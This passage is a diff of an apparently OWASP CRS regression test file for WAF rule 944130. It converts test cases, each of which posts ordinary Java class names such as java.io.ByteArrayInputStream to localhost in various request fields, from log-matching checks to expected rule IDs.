"application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 52 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log: + expect_ids: [944130] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 68 desc: "Argument name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log: + expect_ids: [944130] + - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 